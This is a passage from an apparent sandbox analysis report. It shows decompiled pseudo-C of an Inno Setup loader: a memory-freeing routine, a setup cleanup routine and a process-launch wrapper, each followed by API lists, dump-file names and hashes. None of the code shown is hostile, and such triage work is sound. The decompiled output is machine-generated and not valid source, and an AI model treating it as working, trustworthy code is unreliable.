                                                              • Part of subcall function 0040E450: CreateWindowExW.USER32 ref: 0040E48F
                                                            • SetWindowLongW.USER32 ref: 004B641E
                                                              • Part of subcall function 00422BC4: GetCommandLineW.KERNEL32(00000000,00422C06,?,?,00000000,?,004B647E,004B6680,?), ref: 00422BDA
                                                              • Part of subcall function 004AF728: CreateProcessW.KERNEL32 ref: 004AF798
                                                              • Part of subcall function 004AF728: CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,004AF82C,00000000,004AF81C,00000000), ref: 004AF7AE
                                                              • Part of subcall function 004AF728: MsgWaitForMultipleObjects.USER32 ref: 004AF7C7
                                                              • Part of subcall function 004AF728: GetExitCodeProcess.KERNEL32 ref: 004AF7DB
                                                              • Part of subcall function 004AF728: CloseHandle.KERNEL32(?,?,004BA44C,00000001,?,00000000,000000FF,000004FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004AF7E4
                                                            • RemoveDirectoryW.KERNEL32(00000000,004B6554), ref: 004B6500
                                                            • DestroyWindow.USER32(00120262,004B6554), ref: 004B6514
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Window$CloseCreateHandleProcess$CodeCommandDestroyDirectoryExitLineLongMultipleObjectsRemoveWait
                                                            • String ID: /SL5="$%x,%d,%d,$<pM$InnoSetupLdrWindow$STATIC
                                                            • API String ID: 3586484885-2916600167
                                                            • Opcode ID: 3c021837c984efc67f9ad3a794955b0d04b23bc85077f6812c73bb0a86195aee
                                                            • Instruction ID: 04c90e22d0408fd8de4b79ff2beaee59f7a3a861a1d73b16261182ae62401715
                                                            • Opcode Fuzzy Hash: 3c021837c984efc67f9ad3a794955b0d04b23bc85077f6812c73bb0a86195aee
                                                            • Instruction Fuzzy Hash: EC416B74A002009FE754EBA9EC85B9A37B4EB85308F11453BE0059B2B6CB7CA851CB5D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040426C, Relevance: 12.2, APIs: 8, Instructions: 221sleepCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 91%
                                                            			E0040426C(void* __eax, signed int __edi, void* __ebp) {
				struct _MEMORY_BASIC_INFORMATION _v44;
				void* _v48;
				signed int __ebx;
				void* _t58;
				signed int _t61;
				int _t65;
				signed int _t67;
				void _t70;
				int _t71;
				signed int _t78;
				void* _t79;
				signed int _t81;
				intOrPtr _t82;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				signed int _t92;
				void* _t96;
				signed int _t99;
				void* _t103;
				intOrPtr _t104;
				void* _t106;
				void* _t108;
				signed int _t113;
				void* _t115;
				void* _t116;

				_t56 = __eax;
				_t89 =  *(__eax - 4);
				_t78 =  *0x4bb059; // 0x0
				if((_t89 & 0x00000007) != 0) {
					__eflags = _t89 & 0x00000005;
					if((_t89 & 0x00000005) != 0) {
						_pop(_t78);
						__eflags = _t89 & 0x00000003;
						if((_t89 & 0x00000003) == 0) {
							_push(_t78);
							_push(__edi);
							_t116 = _t115 + 0xffffffdc;
							_t103 = __eax - 0x10;
							E00403C48();
							_t58 = _t103;
							 *_t116 =  *_t58;
							_v48 =  *((intOrPtr*)(_t58 + 4));
							_t92 =  *(_t58 + 0xc);
							if((_t92 & 0x00000008) != 0) {
								_t79 = _t103;
								_t113 = _t92 & 0xfffffff0;
								_t99 = 0;
								__eflags = 0;
								while(1) {
									VirtualQuery(_t79,  &_v44, 0x1c);
									_t61 = VirtualFree(_t79, 0, 0x8000);
									__eflags = _t61;
									if(_t61 == 0) {
										_t99 = _t99 | 0xffffffff;
										goto L10;
									}
									_t104 = _v44.RegionSize;
									__eflags = _t113 - _t104;
									if(_t113 > _t104) {
										_t113 = _t113 - _t104;
										_t79 = _t79 + _t104;
										continue;
									}
									goto L10;
								}
							} else {
								_t65 = VirtualFree(_t103, 0, 0x8000); // executed
								if(_t65 == 0) {
									_t99 = __edi | 0xffffffff;
								} else {
									_t99 = 0;
								}
							}
							L10:
							if(_t99 == 0) {
								 *_v48 =  *_t116;
								 *( *_t116 + 4) = _v48;
							}
							 *0x4bdb78 = 0;
							return _t99;
						} else {
							return 0xffffffff;
						}
					} else {
						goto L31;
					}
				} else {
					__eflags = __bl;
					__ebx =  *__edx;
					if(__eflags != 0) {
						while(1) {
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__eflags == 0) {
								goto L14;
							}
							asm("pause");
							__eflags =  *0x4bb989;
							if(__eflags != 0) {
								continue;
							} else {
								Sleep(0);
								__edx = __edx;
								__ecx = __ecx;
								__eax = 0x100;
								asm("lock cmpxchg [ebx], ah");
								if(__eflags != 0) {
									Sleep(0xa);
									__edx = __edx;
									__ecx = __ecx;
									continue;
								}
							}
							goto L14;
						}
					}
					L14:
					_t14 = __edx + 0x14;
					 *_t14 =  *(__edx + 0x14) - 1;
					__eflags =  *_t14;
					__eax =  *(__edx + 0x10);
					if( *_t14 == 0) {
						__eflags = __eax;
						if(__eax == 0) {
							L20:
							 *(__ebx + 0x14) = __eax;
						} else {
							__eax =  *(__edx + 0xc);
							__ecx =  *(__edx + 8);
							 *(__eax + 8) = __ecx;
							 *(__ecx + 0xc) = __eax;
							__eax = 0;
							__eflags =  *((intOrPtr*)(__ebx + 0x18)) - __edx;
							if( *((intOrPtr*)(__ebx + 0x18)) == __edx) {
								goto L20;
							}
						}
						 *__ebx = __al;
						__eax = __edx;
						__edx =  *(__edx - 4);
						__bl =  *0x4bb059; // 0x0
						L31:
						__eflags = _t78;
						_t81 = _t89 & 0xfffffff0;
						_push(_t101);
						_t106 = _t56;
						if(__eflags != 0) {
							while(1) {
								_t67 = 0x100;
								asm("lock cmpxchg [0x4bbae8], ah");
								if(__eflags == 0) {
									goto L32;
								}
								asm("pause");
								__eflags =  *0x4bb989;
								if(__eflags != 0) {
									continue;
								} else {
									Sleep(0);
									_t67 = 0x100;
									asm("lock cmpxchg [0x4bbae8], ah");
									if(__eflags != 0) {
										Sleep(0xa);
										continue;
									}
								}
								goto L32;
							}
						}
						L32:
						__eflags = (_t106 - 4)[_t81] & 0x00000001;
						_t87 = (_t106 - 4)[_t81];
						if(((_t106 - 4)[_t81] & 0x00000001) != 0) {
							_t67 = _t81 + _t106;
							_t88 = _t87 & 0xfffffff0;
							_t81 = _t81 + _t88;
							__eflags = _t88 - 0xb30;
							if(_t88 >= 0xb30) {
								_t67 = E00403AC0(_t67);
							}
						} else {
							_t88 = _t87 | 0x00000008;
							__eflags = _t88;
							(_t106 - 4)[_t81] = _t88;
						}
						__eflags =  *(_t106 - 4) & 0x00000008;
						if(( *(_t106 - 4) & 0x00000008) != 0) {
							_t88 =  *(_t106 - 8);
							_t106 = _t106 - _t88;
							_t81 = _t81 + _t88;
							__eflags = _t88 - 0xb30;
							if(_t88 >= 0xb30) {
								_t67 = E00403AC0(_t106);
							}
						}
						__eflags = _t81 - 0x13ffe0;
						if(_t81 == 0x13ffe0) {
							__eflags =  *0x4bbaf0 - 0x13ffe0;
							if( *0x4bbaf0 != 0x13ffe0) {
								_t82 = _t106 + 0x13ffe0;
								E00403B60(_t67);
								 *((intOrPtr*)(_t82 - 4)) = 2;
								 *0x4bbaf0 = 0x13ffe0;
								 *0x4bbaec = _t82;
								 *0x4bbae8 = 0;
								__eflags = 0;
								return 0;
							} else {
								_t108 = _t106 - 0x10;
								_t70 =  *_t108;
								_t96 =  *(_t108 + 4);
								 *(_t70 + 4) = _t96;
								 *_t96 = _t70;
								 *0x4bbae8 = 0;
								_t71 = VirtualFree(_t108, 0, 0x8000);
								__eflags = _t71 - 1;
								asm("sbb eax, eax");
								return _t71;
							}
						} else {
							 *(_t106 - 4) = _t81 + 3;
							 *(_t106 - 8 + _t81) = _t81;
							E00403B00(_t106, _t88, _t81);
							 *0x4bbae8 = 0;
							__eflags = 0;
							return 0;
						}
					} else {
						__eflags = __eax;
						 *(__edx + 0x10) = __ecx;
						 *(__ecx - 4) = __eax;
						if(__eflags == 0) {
							__ecx =  *(__ebx + 8);
							 *(__edx + 0xc) = __ebx;
							 *(__edx + 8) = __ecx;
							 *(__ecx + 0xc) = __edx;
							 *(__ebx + 8) = __edx;
							 *__ebx = 0;
							__eax = 0;
							__eflags = 0;
							_pop(__ebx);
							return 0;
						} else {
							__eax = 0;
							__eflags = 0;
							 *__ebx = __al;
							_pop(__ebx);
							return 0;
						}
					}
				}
			}





























                                                            0x0040426c
                                                            0x0040426c
                                                            0x00404275
                                                            0x0040427b
                                                            0x00404364
                                                            0x00404367
                                                            0x00404454
                                                            0x00404455
                                                            0x00404458
                                                            0x00403cf8
                                                            0x00403cfa
                                                            0x00403cfc
                                                            0x00403d01
                                                            0x00403d04
                                                            0x00403d09
                                                            0x00403d0d
                                                            0x00403d13
                                                            0x00403d17
                                                            0x00403d1d
                                                            0x00403d39
                                                            0x00403d3d
                                                            0x00403d40
                                                            0x00403d40
                                                            0x00403d42
                                                            0x00403d4a
                                                            0x00403d57
                                                            0x00403d5c
                                                            0x00403d5e
                                                            0x00403d60
                                                            0x00403d63
                                                            0x00403d63
                                                            0x00403d65
                                                            0x00403d69
                                                            0x00403d6b
                                                            0x00403d6d
                                                            0x00403d6f
                                                            0x00000000
                                                            0x00403d6f
                                                            0x00000000
                                                            0x00403d6b
                                                            0x00403d1f
                                                            0x00403d27
                                                            0x00403d2e
                                                            0x00403d34
                                                            0x00403d30
                                                            0x00403d30
                                                            0x00403d30
                                                            0x00403d2e
                                                            0x00403d73
                                                            0x00403d75
                                                            0x00403d7e
                                                            0x00403d87
                                                            0x00403d87
                                                            0x00403d8a
                                                            0x00403d9a
                                                            0x0040445e
                                                            0x00404463
                                                            0x00404463
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00404281
                                                            0x00404281
                                                            0x00404283
                                                            0x00404285
                                                            0x004042e8
                                                            0x004042e8
                                                            0x004042ed
                                                            0x004042f1
                                                            0x00000000
                                                            0x00000000
                                                            0x004042f3
                                                            0x004042f5
                                                            0x004042fc
                                                            0x00000000
                                                            0x004042fe
                                                            0x00404302
                                                            0x00404307
                                                            0x00404308
                                                            0x00404309
                                                            0x0040430e
                                                            0x00404312
                                                            0x0040431c
                                                            0x00404321
                                                            0x00404322
                                                            0x00000000
                                                            0x00404322
                                                            0x00404312
                                                            0x00000000
                                                            0x004042fc
                                                            0x004042e8
                                                            0x00404287
                                                            0x00404287
                                                            0x00404287
                                                            0x00404287
                                                            0x0040428b
                                                            0x0040428e
                                                            0x004042bc
                                                            0x004042be
                                                            0x004042d3
                                                            0x004042d3
                                                            0x004042c0
                                                            0x004042c0
                                                            0x004042c3
                                                            0x004042c6
                                                            0x004042c9
                                                            0x004042cc
                                                            0x004042ce
                                                            0x004042d1
                                                            0x00000000
                                                            0x00000000
                                                            0x004042d1
                                                            0x004042d6
                                                            0x004042d8
                                                            0x004042da
                                                            0x004042dd
                                                            0x0040436d
                                                            0x00404370
                                                            0x00404372
                                                            0x00404374
                                                            0x00404375
                                                            0x00404377
                                                            0x00404328
                                                            0x00404328
                                                            0x0040432d
                                                            0x00404335
                                                            0x00000000
                                                            0x00000000
                                                            0x00404337
                                                            0x00404339
                                                            0x00404340
                                                            0x00000000
                                                            0x00404342
                                                            0x00404344
                                                            0x00404349
                                                            0x0040434e
                                                            0x00404356
                                                            0x0040435a
                                                            0x00000000
                                                            0x0040435a
                                                            0x00404356
                                                            0x00000000
                                                            0x00404340
                                                            0x00404328
                                                            0x00404379
                                                            0x00404379
                                                            0x00404381
                                                            0x00404385
                                                            0x004043bc
                                                            0x004043bf
                                                            0x004043c2
                                                            0x004043c4
                                                            0x004043ca
                                                            0x004043cc
                                                            0x004043cc
                                                            0x00404387
                                                            0x00404387
                                                            0x00404387
                                                            0x0040438a
                                                            0x0040438a
                                                            0x0040438e
                                                            0x00404392
                                                            0x004043d4
                                                            0x004043d7
                                                            0x004043d9
                                                            0x004043db
                                                            0x004043e1
                                                            0x004043e5
                                                            0x004043e5
                                                            0x004043e1
                                                            0x00404394
                                                            0x0040439a
                                                            0x004043ec
                                                            0x004043f6
                                                            0x00404424
                                                            0x0040442a
                                                            0x0040442f
                                                            0x00404436
                                                            0x00404440
                                                            0x00404446
                                                            0x0040444d
                                                            0x00404451
                                                            0x004043f8
                                                            0x004043f8
                                                            0x004043fb
                                                            0x004043fd
                                                            0x00404400
                                                            0x00404403
                                                            0x00404405
                                                            0x00404414
                                                            0x00404419
                                                            0x0040441c
                                                            0x00404420
                                                            0x00404420
                                                            0x0040439c
                                                            0x0040439f
                                                            0x004043a2
                                                            0x004043aa
                                                            0x004043af
                                                            0x004043b6
                                                            0x004043ba
                                                            0x004043ba
                                                            0x00404290
                                                            0x00404290
                                                            0x00404292
                                                            0x00404298
                                                            0x0040429b
                                                            0x004042a4
                                                            0x004042a7
                                                            0x004042aa
                                                            0x004042ad
                                                            0x004042b0
                                                            0x004042b3
                                                            0x004042b6
                                                            0x004042b6
                                                            0x004042b8
                                                            0x004042b9
                                                            0x0040429d
                                                            0x0040429d
                                                            0x0040429d
                                                            0x0040429f
                                                            0x004042a1
                                                            0x004042a2
                                                            0x004042a2
                                                            0x0040429b
                                                            0x0040428e

                                                            APIs
                                                            • Sleep.KERNEL32(00000000,?,?,00000000,0040BB40,0040BBA6,?,00000000,?,?,0040BEC9,00000000,?,00000000,0040C3CA,00000000), ref: 00404302
                                                            • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,0040BB40,0040BBA6,?,00000000,?,?,0040BEC9,00000000,?,00000000,0040C3CA), ref: 0040431C
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID:
                                                            • API String ID: 3472027048-0
                                                            • Opcode ID: bb44cecb062a42ab294f9ebbddb74143d6ecf503913ace061e42b720e5e9e313
                                                            • Instruction ID: daf3465a9571387f72e828d046180f4ce70f3b260d456b91f151aa63c4646fa2
                                                            • Opcode Fuzzy Hash: bb44cecb062a42ab294f9ebbddb74143d6ecf503913ace061e42b720e5e9e313
                                                            • Instruction Fuzzy Hash: AA71E2B17042008BD715DF29CC84B16BBD8AF85715F2482BFE984AB3D2D7B899418789
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004B60E8, Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 165windowCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 75%
                                                            			E004B60E8(void* __ebx, void* __edi, void* __esi, void* __fp0) {
				intOrPtr _t26;
				intOrPtr _t31;
				intOrPtr _t37;
				intOrPtr _t38;
				intOrPtr _t42;
				intOrPtr _t44;
				intOrPtr _t47;
				intOrPtr _t51;
				intOrPtr _t53;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t59;
				intOrPtr _t61;
				WCHAR* _t63;
				intOrPtr _t69;
				intOrPtr _t74;
				int _t75;
				intOrPtr _t76;
				intOrPtr _t78;
				struct HWND__* _t81;
				intOrPtr _t82;
				intOrPtr _t86;
				void* _t90;
				intOrPtr _t93;
				intOrPtr _t99;
				intOrPtr _t101;
				intOrPtr _t107;
				intOrPtr _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				void* _t120;
				intOrPtr _t121;

				_t119 = __esi;
				_t118 = __edi;
				_t85 = __ebx;
				_pop(_t101);
				_pop(_t88);
				 *[fs:eax] = _t101;
				E004AF678(_t88);
				if( *0x4ba440 == 0) {
					if(( *0x4c1d71 & 0x00000001) == 0 &&  *0x4ba441 == 0) {
						_t61 =  *0x4ba674; // 0x4c0d0c
						_t4 = _t61 + 0x2f8; // 0x0
						_t63 = E004084EC( *_t4);
						_t88 = _t120 - 0x28;
						_t101 =  *0x4c1c48; // 0x0
						E00426F08(0xc2, _t120 - 0x28, _t101);
						if(MessageBoxW(0, E004084EC( *((intOrPtr*)(_t120 - 0x28))), _t63, 0x24) != 6) {
							 *0x4ba44c = 2;
							E0041F238();
						}
					}
					E004056D0();
					E004AEFE8(_t120 - 0x2c, _t85, _t101, _t118, _t119); // executed
					E00407E00(0x4c1d94,  *((intOrPtr*)(_t120 - 0x2c)));
					_t26 =  *0x4c1d84; // 0x0
					E00422954(_t26, _t88, _t120 - 0x34);
					E004226C8( *((intOrPtr*)(_t120 - 0x34)), _t85, _t120 - 0x30, L".tmp", _t118, _t119);
					_push( *((intOrPtr*)(_t120 - 0x30)));
					_t31 =  *0x4c1d94; // 0x0
					E00422660(_t31, _t120 - 0x38);
					_pop(_t90);
					E0040873C(0x4c1d98, _t90,  *((intOrPtr*)(_t120 - 0x38)));
					_t107 =  *0x4c1d98; // 0x0
					E00407E00(0x4c1d9c, _t107);
					_t37 =  *0x4c1d90; // 0x4d703c
					_t15 = _t37 + 0x14; // 0x41c6fb
					_t38 =  *0x4c1d88; // 0x0
					E00423CE8(_t38,  *_t15);
					_push(_t120);
					_push(0x4b63ab);
					_push( *[fs:edx]);
					 *[fs:edx] = _t121;
					 *0x4c1de0 = 0;
					_t42 = E00423D00(1, 0, 1, 0); // executed
					 *0x4c1d8c = _t42;
					_push(_t120);
					_push(0x4b639a);
					_push( *[fs:eax]);
					 *[fs:eax] = _t121;
					_t44 =  *0x4c1d90; // 0x4d703c
					_t16 = _t44 + 0x18; // 0x30be00
					 *0x4c1de0 = E004053F0( *_t16);
					_t47 =  *0x4c1d90; // 0x4d703c
					_t17 = _t47 + 0x18; // 0x30be00
					_t86 =  *0x4c1de0; // 0x7fba0010
					E00405884(_t86,  *_t17);
					_push(_t120);
					_push(0x4b62e9);
					_push( *[fs:eax]);
					 *[fs:eax] = _t121;
					_t51 =  *0x424cd8; // 0x424d30
					_t93 =  *0x4c1d88; // 0x0
					_t53 = E00424748(_t93, 1, _t51); // executed
					 *0x4c1de4 = _t53;
					_push(_t120);
					_push(0x4b62d8);
					_push( *[fs:eax]);
					 *[fs:eax] = _t121;
					_t55 =  *0x4c1d90; // 0x4d703c
					_t18 = _t55 + 0x18; // 0x30be00
					_t56 =  *0x4c1de4; // 0x9aac00
					E00424A24(_t56,  *_t18, _t86);
					_pop(_t114);
					 *[fs:eax] = _t114;
					_push(E004B62DF);
					_t59 =  *0x4c1de4; // 0x9aac00
					return E00405CE8(_t59);
				} else {
					_t69 =  *0x4ba674; // 0x4c0d0c
					_t1 = _t69 + 0x1d0; // 0x0
					E004AFA44( *_t1, __ebx, __edi, __esi);
					 *0x4ba44c = 0;
					_pop(_t115);
					 *[fs:eax] = _t115;
					_push(E004B6554);
					_t74 =  *0x4c1d88; // 0x0
					_t75 = E00405CE8(_t74);
					if( *0x4c1d9c != 0) {
						_t117 =  *0x4c1d9c; // 0x0
						_t75 = E004AF1B4(0, _t117, 0xfa, 0x32); // executed
					}
					if( *0x4c1d94 != 0) {
						_t82 =  *0x4c1d94; // 0x0
						_t75 = RemoveDirectoryW(E004084EC(_t82)); // executed
					}
					if( *0x4ba450 != 0) {
						_t81 =  *0x4ba450; // 0x120262
						_t75 = DestroyWindow(_t81); // executed
					}
					if( *0x4c1d78 != 0) {
						_t76 =  *0x4c1d78; // 0x0
						_t99 =  *0x4c1d7c; // 0x1
						_t116 =  *0x426bb0; // 0x426bb4
						E00408D08(_t76, _t99, _t116);
						_t78 =  *0x4c1d78; // 0x0
						E0040540C(_t78);
						 *0x4c1d78 = 0;
						return 0;
					}
					return _t75;
				}
			}




































                                                            0x004b60e8
                                                            0x004b60e8
                                                            0x004b60e8
                                                            0x004b60ea
                                                            0x004b60ec
                                                            0x004b60ed
                                                            0x004b610d
                                                            0x004b6119
                                                            0x004b613e
                                                            0x004b614b
                                                            0x004b6150
                                                            0x004b6156
                                                            0x004b615c
                                                            0x004b615f
                                                            0x004b6169
                                                            0x004b6181
                                                            0x004b6183
                                                            0x004b618d
                                                            0x004b618d
                                                            0x004b6181
                                                            0x004b6192
                                                            0x004b619a
                                                            0x004b61a7
                                                            0x004b61af
                                                            0x004b61b4
                                                            0x004b61c4
                                                            0x004b61cc
                                                            0x004b61d0
                                                            0x004b61d5
                                                            0x004b61e2
                                                            0x004b61e3
                                                            0x004b61ed
                                                            0x004b61f3
                                                            0x004b61f8
                                                            0x004b61fd
                                                            0x004b6200
                                                            0x004b6205
                                                            0x004b620c
                                                            0x004b620d
                                                            0x004b6212
                                                            0x004b6215
                                                            0x004b621a
                                                            0x004b6232
                                                            0x004b6237
                                                            0x004b623e
                                                            0x004b623f
                                                            0x004b6244
                                                            0x004b6247
                                                            0x004b624a
                                                            0x004b624f
                                                            0x004b6257
                                                            0x004b625c
                                                            0x004b6261
                                                            0x004b6264
                                                            0x004b626e
                                                            0x004b6275
                                                            0x004b6276
                                                            0x004b627b
                                                            0x004b627e
                                                            0x004b6281
                                                            0x004b6287
                                                            0x004b6294
                                                            0x004b6299
                                                            0x004b62a0
                                                            0x004b62a1
                                                            0x004b62a6
                                                            0x004b62a9
                                                            0x004b62ac
                                                            0x004b62b1
                                                            0x004b62b6
                                                            0x004b62bb
                                                            0x004b62c2
                                                            0x004b62c5
                                                            0x004b62c8
                                                            0x004b62cd
                                                            0x004b62d7
                                                            0x004b611b
                                                            0x004b611b
                                                            0x004b6120
                                                            0x004b6126
                                                            0x004b612d
                                                            0x004b64b5
                                                            0x004b64b8
                                                            0x004b64bb
                                                            0x004b64c0
                                                            0x004b64c5
                                                            0x004b64d1
                                                            0x004b64df
                                                            0x004b64e7
                                                            0x004b64e7
                                                            0x004b64f3
                                                            0x004b64f5
                                                            0x004b6500
                                                            0x004b6500
                                                            0x004b650c
                                                            0x004b650e
                                                            0x004b6514
                                                            0x004b6514
                                                            0x004b6520
                                                            0x004b6522
                                                            0x004b6527
                                                            0x004b652d
                                                            0x004b6533
                                                            0x004b6538
                                                            0x004b653d
                                                            0x004b6544
                                                            0x00000000
                                                            0x004b6544
                                                            0x004b6549
                                                            0x004b6549

                                                            APIs
                                                            • MessageBoxW.USER32(00000000,00000000,00000000,00000024), ref: 004B6179
                                                              • Part of subcall function 004AFA44: MessageBoxW.USER32(00000000,00000000,Setup,00000010), ref: 004AFAAE
                                                            • RemoveDirectoryW.KERNEL32(00000000,004B6554), ref: 004B6500
                                                            • DestroyWindow.USER32(00120262,004B6554), ref: 004B6514
                                                              • Part of subcall function 004AF1B4: Sleep.KERNEL32(?,?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1D3
                                                              • Part of subcall function 004AF1B4: GetLastError.KERNEL32(?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1F6
                                                              • Part of subcall function 004AF1B4: GetLastError.KERNEL32(?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF200
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: ErrorLastMessage$DestroyDirectoryRemoveSleepWindow
                                                            • String ID: .tmp$0MB$<pM
                                                            • API String ID: 3858953238-1900878030
                                                            • Opcode ID: 930ec171da33bb7cb26a68baf49ed61eca7e6ecce176de484762bd5e64518e8e
                                                            • Instruction ID: b159488041d1577a8b45ed1a1d18f26c00613076fc9a683522f38ff229f2206a
                                                            • Opcode Fuzzy Hash: 930ec171da33bb7cb26a68baf49ed61eca7e6ecce176de484762bd5e64518e8e
                                                            • Instruction Fuzzy Hash: AC615A342002009FD755EF69ED86EAA37A5EB4A308F51453AF801976B2DA3CBC51CB6D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004AF728, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 77processCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 61%
                                                            			E004AF728(void* __eax, void* __ebx, DWORD* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				struct _STARTUPINFOW _v76;
				void* _v88;
				void* _v92;
				int _t23;
				intOrPtr _t49;
				DWORD* _t51;
				void* _t56;

				_v8 = 0;
				_t51 = __ecx;
				_t53 = __edx;
				_t41 = __eax;
				_push(_t56);
				_push(0x4af7ff);
				_push( *[fs:eax]);
				 *[fs:eax] = _t56 + 0xffffffa8;
				_push(0x4af81c);
				_push(__eax);
				_push(0x4af82c);
				_push(__edx);
				E004087C4( &_v8, __eax, 4, __ecx, __edx);
				E00405884( &_v76, 0x44);
				_v76.cb = 0x44;
				_t23 = CreateProcessW(0, E004084EC(_v8), 0, 0, 0, 0, 0, 0,  &_v76,  &_v92); // executed
				_t58 = _t23;
				if(_t23 == 0) {
					E004AF34C(0x83, _t41, 0, _t53, _t58);
				}
				CloseHandle(_v88);
				do {
					E004AF6FC();
				} while (MsgWaitForMultipleObjects(1,  &_v92, 0, 0xffffffff, 0x4ff) == 1);
				E004AF6FC();
				GetExitCodeProcess(_v92, _t51); // executed
				CloseHandle(_v92);
				_pop(_t49);
				 *[fs:eax] = _t49;
				_push(0x4af806);
				return E00407A20( &_v8);
			}











                                                            0x004af733
                                                            0x004af736
                                                            0x004af738
                                                            0x004af73a
                                                            0x004af73e
                                                            0x004af73f
                                                            0x004af744
                                                            0x004af747
                                                            0x004af74a
                                                            0x004af74f
                                                            0x004af750
                                                            0x004af755
                                                            0x004af75e
                                                            0x004af76d
                                                            0x004af772
                                                            0x004af798
                                                            0x004af79d
                                                            0x004af79f
                                                            0x004af7a5
                                                            0x004af7a5
                                                            0x004af7ae
                                                            0x004af7b3
                                                            0x004af7b3
                                                            0x004af7cc
                                                            0x004af7d1
                                                            0x004af7db
                                                            0x004af7e4
                                                            0x004af7eb
                                                            0x004af7ee
                                                            0x004af7f1
                                                            0x004af7fe

                                                            APIs
                                                            • CreateProcessW.KERNEL32 ref: 004AF798
                                                            • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,004AF82C,00000000,004AF81C,00000000), ref: 004AF7AE
                                                            • MsgWaitForMultipleObjects.USER32 ref: 004AF7C7
                                                            • GetExitCodeProcess.KERNEL32 ref: 004AF7DB
                                                            • CloseHandle.KERNEL32(?,?,004BA44C,00000001,?,00000000,000000FF,000004FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004AF7E4
                                                              • Part of subcall function 004AF34C: GetLastError.KERNEL32(00000000,004AF3F5,?,?,00000000), ref: 004AF36F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                            • String ID: D
                                                            • API String ID: 3356880605-2746444292
                                                            • Opcode ID: ad1163668f60b09aa263e635df1463f1e4b37e8a5aa9c4cbf2e159c77cef0046
                                                            • Instruction ID: 88989adc3f1fa39a5a5eb6990527994e2deb527bcdcae90bffb7d35c0d41af56
                                                            • Opcode Fuzzy Hash: ad1163668f60b09aa263e635df1463f1e4b37e8a5aa9c4cbf2e159c77cef0046
                                                            • Instruction Fuzzy Hash: C01163716041096EEB00FBE68C42F9F77ACDF56714F50053AB604E72C5DA789905866D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004B5A90, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 60%
                                                            			E004B5A90(void* __ebx, void* __ecx, void* __edx, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _t16;
				intOrPtr _t32;
				intOrPtr _t41;

				_t27 = __ebx;
				_push(0);
				_push(0);
				_push(0);
				_push(_t41);
				_push(0x4b5b5a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t41;
